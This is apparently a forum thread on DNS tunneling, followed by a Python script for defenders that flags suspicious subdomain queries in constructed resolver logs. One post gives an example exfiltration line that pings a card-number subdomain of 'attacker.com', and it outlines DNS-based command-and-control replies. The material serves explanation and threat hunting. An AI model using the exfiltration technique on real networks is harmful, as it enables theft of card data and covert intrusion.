The magic of DNS tunneling is that it uses the normal methods of resolving names, so internal DNS servers/forwarders become proxy servers for the attacker's connection out to the Internet.
The most simple example someone gave me years ago was if someone wants to exfiltrate a credit card number, they can ping 4084515531278764-0424-789.attacker.com from an internal system. It doesn't matter if the ping succeeds. If the internal system gets a resolution response back from the internal DNS, the attacker has the card number in their DNS logs.
Tunneling TCP or other C2 traffic is just an extension of that which includes the attacker's DNS server sending a message (4 arbitrary bytes in the form of an IPv4 address, or more data in the form of a TXT record response, etc.) back to the internal system via the normal response path.
It's pretty clever, IMO. Most sysadmins think of DNS as being like a phonebook, but phonebooks are a single, supposedly authoritative source, and DNS is decentralized.
That really is pretty clever. Thanks a lot for explaining! Wish I could upvote multiple times.
I didn't even consider the normal resolver path because of caching, rate limits and performance, but it's not like we're building a production protocol here, it just needs to work enough to facilitate minimal communication.
This will make an interesting threat hunting exercise.
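A defender-side starting point for that hunting exercise, added here as an example and not code from anyone in the thread: it scans constructed DNS query log lines for the subdomain-as-payload signature described above (digit-only or high-entropy labels under one registered domain). The log format, domain names, and thresholds are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed sample log, one query per line: "<timestamp> <client> <qname> <qtype>".
# Domains are made up; the first attacker query mirrors the card-number trick above.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 www.example.com A
2024-01-01T10:00:02 10.0.0.5 4084515531278764-0424-789.attacker.example A
2024-01-01T10:00:03 10.0.0.5 mail.example.com MX
2024-01-01T10:00:04 10.0.0.7 6gvqkz2x4j8h0m3p.attacker.example TXT
2024-01-01T10:00:05 10.0.0.7 tq9w7e3r5y1u8i2o.attacker.example TXT
2024-01-01T10:00:06 10.0.0.9 cdn.example.com A
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payloads score higher than real hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname: str) -> str:
    """Naive split on the last two labels (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def score_query(qname: str, max_label_len: int = 30, min_entropy: float = 3.5) -> list:
    """Reasons a single query name looks like it carries smuggled data."""
    labels = qname.rstrip(".").split(".")[:-2]  # labels left of the registered domain
    reasons = set()
    for label in labels:
        if len(label) > max_label_len:
            reasons.add("long-label")
        if shannon_entropy(label) >= min_entropy:
            reasons.add("high-entropy")
        if len(label) >= 12 and re.fullmatch(r"[0-9-]+", label):
            reasons.add("digits-only")  # PAN/ID-style payloads, as in the thread
    return sorted(reasons)

def hunt(log_text: str) -> dict:
    """Per registered domain: distinct subdomain count plus flagged queries and why."""
    subs, flagged = defaultdict(set), defaultdict(list)
    for line in log_text.splitlines():
        _ts, _client, qname, _qtype = line.split()
        dom = registered_domain(qname)
        subs[dom].add(qname)
        if (reasons := score_query(qname)):
            flagged[dom].append((qname, reasons))
    return {d: {"unique_subdomains": len(subs[d]), "flagged": flagged[d]} for d in subs}
```

On real resolver logs, the distinct-subdomain count per domain over a time window is usually the stronger signal, since a tunnel has to mint a fresh name per message to beat caching.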